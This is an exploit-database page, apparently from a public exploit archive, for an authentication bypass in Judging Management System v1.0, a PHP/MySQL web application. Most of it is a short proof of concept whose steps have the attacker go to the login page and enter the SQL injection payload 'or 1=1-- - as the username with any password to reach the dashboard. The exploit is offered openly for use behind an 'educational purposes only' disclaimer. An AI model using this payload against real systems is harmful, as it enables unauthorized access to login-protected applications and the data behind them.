Judging management system v1.0 authentication bypass Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-31 |
Type : webapps |
Platform : php
This exploit / vulnerability Judging management system v1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password